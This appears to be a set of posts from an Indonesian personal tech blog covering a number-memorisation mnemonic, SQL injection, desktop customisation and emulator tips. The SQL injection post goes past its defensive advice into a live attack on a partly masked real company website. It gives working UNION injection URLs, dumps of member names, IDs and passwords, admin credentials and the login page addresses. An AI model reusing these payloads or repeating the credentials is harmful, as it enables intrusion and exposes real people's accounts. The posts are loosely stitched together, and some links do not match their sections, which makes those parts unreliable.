Belum? Ah masa? Ingat dengan MeJiKuHiBiNiU? Ya, cara mengingat warna pelangi yang dulu kita pelajari di SD itu termasuk teknik/metode mnemonic. Cara menghapal jumlah hari dalam tiap bulan (lihat gambar di bawah) yang diajarkan guru kita juga merupakan salah satu contoh metode memorisasi/mnemonic.

Knuckle Mnemonic

Jika ditelusuri, mnemonic berasal dan berkembang terutama sejak jaman Yunani dan Romawi kuno (Nama dewi ingatan Yunani: Mnemosyne). Orang Yunani dan Romawi kuno membedakan ingatan ke dalam 2 tipe: ingatan alami dan ingatan buatan/artificial. Berbeda dgn ingatan alami yg diperoleh dari lahir, ingatan buatan diperoleh dgn berlatih metode mnemonic. Mnemonic yang dimaksudkan di sini adalah semua metode/sistem untuk menghapal.

Ada banyak sekali metode mnemonic dan variasinya… Di kesempatan kali ini, kita akan belajar salah satu metode mnemonic tertua: MAJOR SYSTEM/Sistem Utama. Sistem ini disebut juga Phonetic System karena menggunakan lafal bunyi. Major System bekerja dengan cara meng-convert angka 0-9 menjadi huruf konsonan, misal: 0=S/Z, 1=T/D, 2=N, 3=M, 4=R, 5=L, 6=J, 7=K/C, 8=F/V, 9=B/P. Penjelasan mengapa huruf2 tersebut dipilih, bisa dilihat di tabel berikut:

Penerapan untuk menghapal nomor telepon, andaikan kita ingin menghapalkan nomor telepon berikut: 021531234. Dengan konversi angka ke bunyi konsonan sesuai tabel, didapatkan huruf S-N-T-L-M-D-N-M-R. Sisipkan vokal, misalkan menjadi: SoNToLoyoMeDaNMaRio. Nah, lebih mudah mengingatnya bukan? Saya hanya perlu membayangkan seorang teman saya yang orangnya rada sontoloyo bernama Mario yang asalnya dari kota Medan.

Contoh barusan merupakan cara penerapan Major System/Sistem Utama yang paling sederhana namun memiliki kekurangan… Semakin panjang digit angka yang perlu dihapal, maka akan sangat sulit jika hanya menggunakan cara tersebut.

Solusinya adalah meng-assign suatu objek untuk setiap angka sesuai huruf penggantinya. Mulai dari 0-9 dulu. Sorry contohnya bahasa inggris yah, soalnya objek hapalan saya semua pakai english

0=Saw (gergaji)
1=Tie (dasi)
2=Noah (nuh)
3=Ma (mama)
4=Ray (sinar)
5=Law (hukum, saya pakai gambaran pak polisi dengan kumis sangarnya)
6=Jaw (rahang)
7=Cow (sapi)
8=Eve (nabi hawa)
9=Bee (lebah).

Kamu bebas meng-assign lebih dari satu objek untuk satu angka, misalkan Toe(jempol kaki) juga bisa mewakili angka 1. Cara ini berguna untuk meminimalisir perulangan objek pada suatu deret hapalan.

Sekarang mari kita lihat contoh nomor telepon tadi: 021531234. Substitusi angka dengan masing-masing objeknya, didapat: Saw-Noah-Tie-Law-Mama-Toe-Noah-Mama-Ray. Karanglah sebuah cerita dengan objek2 tersebut saling berinteraksi (INGAT, semakin LEBAY ceritanya akan semakin mudah diingat).

Cerita versi saya untuk mengingat angka tadi: sebuah GERGAJI menggergaji janggut nabi NUH yang bentuknya seperti DASI. Janggut tersebut sangat panjang sehingga membelit tubuh pak POLISI. Datang MAMA menolong dengan memutus belitannya menggunakan JEMPOL KAKI. NUH marah2 marah2 sama MAMA dan menghukum dengan mengeluarkan SINAR laser dari tongkatnya.

Dengan mengarang cerita seperti ini,  ingatan yang seharusnya jangka pendek tersebut dapat ter-transfer ke memori jangka panjang.

Saya bahkan masih ingat sebagian alur cerita satu DECK KARTU yang saya hapalkan sewaktu di dalam pesawat ke Medan lebih dari setahun lalu. Seperti layaknya saya memutar kembali di dalam kepala adegan film yang pernah saya tonton:)

Lha kalau begitu, apa gak kepenuhan nanti isi otak saya kalau terlalu banyak angka yang dihapal pak? Mungkin kamu bertanya-tanya… Jangan kuatir, otak kita tak akan kepenuhan… Toh dalam berpuluh tahun usia kita, berapa banyak film yang pernah kita tonton dan kita ingat dengan persis detail dalam film tersebut bukan? Apalagi kalau filmnya berisi adegan yang UNIK, LEBAY, NORAK, TRAUMATIS, DSB. Itulah sebabnya rekan saya Muhammad Iril Khairul Anam, mantan pemegang rekor dunia Rubik Multiple-Blindfolded, menggunakan adegan2 film sadis seperti dalam film Hostel dan Saw dalam memorisasinya.

Otak kita juga mempunyai sistem yang cukup efisien dalam organisasi data. Otak menyimpan informasi baru dengan membentuk ikatan antar neuron sehingga membentuk jalur baru. Memori yang tidak pernah atau jarang di-recall otomatis lambat-laun akan melemah ikatan antar neuronnya sehingga sulit kita ingat, bahkan bisa jadi kita lupakan sama sekali.

Baiklah, untuk pengantar Sistem Utama saya rasa cukup di sini, jika ada yang kurang jelas dan ingin ditanyakan silakan posting komentar di bawah. Di lain waktu, saya akan membahas lebih detail mengenai pengembangan metode Major System dan penerapannya untuk menghapalkan deck kartu, daftar belanjaan, memorisasi rubik, atau menghapalkan APAPUN. Jadi, stay tuned di www.abelbrata.com

Injecting SQL Statement

Anda mungkin pernah mendengar tentang “SQL Injection”… Makhluk apakah itu, dan apa hubungannya dengan suntik-menyuntik (inject)? Well, yang dimaksud dengan SQL Injection adalah suatu metode “menyuntikkan” atau dengan kata lain menyisipkan statement SQL ke dalam variabel yang dikirim ke server yang berupa POST, GET, atau COOKIE.

Sebagai contoh, jika Anda mempunyai script seperti ini:

$username = $_POST['username'];
$password = $_POST['password'];
$query = ”SELECT * FROM users WHERE user=’$username’ AND password=’$password’”;
mysql_query($query);

Penggalan script di atas adalah contoh suatu proses login yang tidak secure. Nah, bagaimana jadinya kalau ada yang “iseng” memasukkan kode lain di variabel $_GET? Misalnya:

Username: Hacker
Password: ‘ OR ”=’

Maka query login tadi akan menjadi:
“SELECT * FROM users WHERE user=’Hacker’ AND password=” OR ”=””

Artinya… Sang penyusup dapat lolos dari pengecekan dan login dengan leluasa. Karena dari password yang diinput tadi akan memecah query dan menambahkan suatu kondisi yang bernilai TRUE (”=” adalah TRUE), sehingga hasilnya akan menjadi TRUE AND TRUE = TRUE

Selain bisa diinject ke dalam form, SQL Injection bisa dilakukan di celah-celah lain yang mungkin ada di suatu website seperti di URL… Untuk mencegah SQL Injection, maka SEMUA input yang masuk ke script/database harus di-”steril”-kan. Beberapa cara mensterilkan input misalnya dengan:

• fungsi mysql_real_escape_string() –> http://www.php.net/manual/en/function.mysql-real-escape-string.php
• htmlentities(), htmlspecialchars(), strip_tags()
• stripslashes() dan addslashes()

Contoh fungsi yang bisa Anda gunakan untuk mensterilkan inputan:

function cleanQuery($string)
{
if(get_magic_quotes_gpc())  // prevents duplicate backslashes
{
$string = stripslashes($string);
}
if (phpversion() >= ’4.3.0′)
{
$string = mysql_real_escape_string($string);
}
else
{
$string = mysql_escape_string($string);
}
return $string;
}

Contoh cara penggunaan: cleanQuery($_POST['username'])

magic_quotes_gpc secara otomatis menambahkan “\” untuk setiap data yang dikirimkan dari browser (GET, POST, COOKIE). Dengan demikian tidak perlu secara manual menjalankan fungsi addslashes untuk setiap variabel inputan (That’s why it’s called MAGIC). Akan tetapi, dengan settingan magic_quotes_gpc ON justru banyak kekurangannya… Andai suatu saat script Anda terpaksa dipindahkan ke server yang settingan magic_quotes OFF, atau jika suatu saat admin web hosting Anda mengubah settingan menjadi OFF (sengaja atau tidak sengaja)… maka data-data yang tersimpan di database Anda bisa menjadi tidak bersih.

Untuk mengecek apakah settingan magic_quotes_gpc aktif atau tidak, carilah di file PHP.INI baris:

magic_quotes_gpc = Off		; magic quotes for incoming GET/POST/Cookie data

Pada baris di atas berarti settingannya dalam kondisi OFF

Setelah mempelajari teori dan cara menanggulangi SQL Injection, marilah kita sekarang melihat pada kasus “real” di dunia nyata. Berikut ini adalah studi kasus SQL Injection yang pernah saya uji pada sebuah website produsen material bangunan terkemuka di Indonesia. Karena sekarang websitenya sudah dibetulkan dari celah SQL Injection, maka tak salah bukan kalau saya membaginya di sini?

Salah satu syarat menguasai SQL Injection dan juga metode mengatasinya, mau tak mau Anda harus menguasai SQL statement dari DBMS (Database Management System) yang dipergunakan. Pada contoh di bawah ini, database yang dipakai adalah Microsoft SQL Server dengan ASP scripting.

Teknik SQL Injection yang dipraktekkan di bawah ini sering dinamakan Blind SQL Injection. Karena mengandalkan dari pesan error yang dikeluarkan oleh script program ketika SQL statement dipecah/diinject… Seolah-olah Anda seperti orang buta yang meraba-raba untuk mengetahui jalan (dalam hal ini struktur database korban). Sayangnya saya tidak sempat menyimpan error message dalam bentuk text maupun printscreen (maafkan saya)…

Okay cukup pengantarnya, di bawah ini adalah statement2 yang saya gunakan untuk mendapatkan username beserta password member:

http://www.r**anceramics.com/roman/product/floor/collection.asp?size=30×30′%20UNION%20SELECT%20TOP%201%20COLUMN_NAME%20,1,2,3,4,5,6,7,8

%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=’member’%20AND%20COLUMN_NAME
%20NOT%20IN%20(‘member_id’,'password’,'salutation’,'fullname’,'company’,'title’,'address’,'country’,'phone’,
‘mobile’,'email’,'joindate’,'flagactive’,'flagnews’,'lastlogin’)–

http://www.r**anceramics.com/roman/product/floor/collection.asp?size=30×30′%20UNION%20SELECT%20TOP%201%20convert(int,%20password%2b’%20morpheus’)

,1,2,3,4,5,6,7,8%20FROM%20member%20where%20member_id%20LIKE%20′E%25′–

http://www.r**anceramics.com/roman/product/floor/collection.asp?size=30×30′%20UNION%20SELECT%20TOP%201%20member_id,1,2,3,4,5,6,7,8%20

FROM%20member%20where%20member_id%20LIKE%20′E%25′–

—————————————————–
FULLNAME        MEMBER_ID    PASSWORD
—————————————————–
Mohammed Al Abbas    ABBAS        185111
Guido BALDERS        BALDERS        995094
Rolando Campollo    CAMPOLLO    977756
Fauzy            Fauzy        872335

Untuk mendapatkan admin & passwordnya:

http://www.r**anceramics.com/roman/product/floor/collection.asp?size=30×30′%20UNION%20SELECT%20TOP%201%20COLUMN_NAME%20,1,2,3,4,5,6,7,8

%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=’admin’%20AND%20
COLUMN_NAME%20NOT%20IN%20(‘admin_id’,'password’,'name’,'access_level’)–

—————————————————–
ADMIN_ID    PASSWORD
—————————————————–
admin        srkioke
adrianto    karawaci
david        newadmin
florence    newadmin
yonathan    admin123

==================================
LOGIN PAGE – MEMBER
==================================

http://www.r**anceramics.com/roman/more/default.asp

==================================
LOGIN PAGE – ADMIN
==================================

http://www.r**anceramics.com/roman/admin

Anda bisa lihat betapa berbahayanya tidak membersihkan variabel yang dikirimkan oleh browser… Karena pada dasarnya apapun yang berasal dari browser (user) adalah dalam kekuasaannya dan bisa diotak-atik sebelum dikirimkan. Pada contoh ini saya hanya mendapatkan satu celah di file http://www.r**anceramics.com/roman/product/floor/collection.asp… Akan tetapi cukup untuk mendapatkan semua data yang dibutuhkan. Mengerikan bukan? Bagaimana bila penyusup berniat jahat? Menghapus semua tabel di database Anda tentu bukan hal yang sulit dengan perintah DROP… dan BOOM! Hilanglah semua data customer Anda…

Ada pula developer yang mengamankan datanya dengan cara “brutal”, yaitu mengenkripsi semua data dalam database dengan harapan bahwa data tidak akan terbaca meskipun berhasil diekstrak oleh penyusup. Alih-alih mendapatkan sistem yang lebih secure, justru proses query dan pengolahan data menjadi lebih lama dan membebani server… apalagi jika jumlah record bertambah banyak.

Jadi kesimpulannya untuk mengatasi SQL Injection, amankanlah semua data yang dikirimkan balik oleh browser kepada sistem dan hindarilah (kalau perlu ubah) error message SQL apabila terjadi kesalahan. Memang betul tidak ada sistem yang 100% sempurna, namun sebisa mungkin kita harus menutup celah bagi calon penyusup yang berniat buruk terhadap sistem yang kita bangun.

Mengubah Windows Lawas Menjadi Windows 8

Versi terbaru Windows telah diluncurkan oleh Microsoft pada bulan Oktober lalu, namun masih banyak pengguna Windows versi sebelumnya yang bertahan dengan Windows 7, Vista, bahkan Windows XP! Beragam alasannya… Ada yang berpendapat segala kebutuhannya telah dapat dipenuhi di Windows 7 atau XP, lantas mengapa harus beralih ke Windows 8? Apalagi jika di dalam komputernya sudah terinstall banyak aplikasi… tentu akan merepotkan kalau harus upgrade dan install ulang satu-persatu programnya  apalagi kalau pengguna Windows XP.

Buat Anda yang sekadar ingin mencicipi rasa Windows 8 di PC tanpa harus menginstallnya, ada cara mudah yaitu menggunakan paket Windows 8 Transformation Pack. Paket kustomisasi desktop ini akan mengubah windows lawas menjadi windows 8. Tentunya hanya sebatas tampilan dan user interface:) Segala risiko akibat menggunakan Windows 8 Transformation Pack ini harap tanggung sendiri ya (karena kondisi PC tiap orang pastinya berbeda-beda).

Download Windows 8 Transformation Pack untuk XP, Vista dan Seven (KLIK DI SINI)

Windows 8 Transformation Pack

Bluestacks App Player

Sistem operasi Android semakin mandapat tempat di hati pengguna smartphone/tablet… dan seiring dengan menanjaknya popularitas Android, jumlah aplikasi di Google Play Store (toko aplikasi Android milik Google) kian bertambah banyak. Saat artikel ini ditulis, tidak kurang dari 750.000 aplikasi Android dapat diakses di Play Store. Wauw…..sungguh fantastis!

Sayangnya, banyak dari aplikasi populer yang terdapat di Android tidak mempunyai versi Windows/Mac. Sehingga tidak dapat diinstall dan digunakan di sistem operasi PC. Padahal mungkin kita terlanjur memiliki “ikatan batin” dengan aplikasi-aplikasi tersebut. Sebut saja misalnya… Instagram dan WhatsApp. Namun sekarang telah ada cara menjalankan app Android di PC Windows/Mac, yaitu dengan menggunakan software virtualisasi Bluestacks App Player yang bisa didownload di www.bluestacks.com

Dengan Bluestacks, kita dapat mendownload dan menginstall Android App… seakan mempunyai sebuah handphone/tablet Android dalam PC kita!

Instagram di Windows

WhatsApp di Windows

Untuk mendownloadnya, silakan klik link ini: http://doublecommand.sourceforge.net

Setelah Anda mendownload dan menginstalasi DoubleCommand, akses konfigurasinya melalui System Preferences. Di bagian “Others”, klik icon DoubleCommand.

Contoh pengaturan:

Recharging my gadget once a day, I think that was already good… but I wanted even longer battery life, if possible. So I came out with this solution: an app that turns off my internet connection whenever I turn-off/lock the screen, but still running in background, turning on internet connection at a given time interval (mine’s every 30 minutes).

The app name is “Internet Commander” and it’s FREE! There’s a paid version but I think this one is suffice

Download link: https://play.google.com/store/apps/details?id=de.ivo.internetcom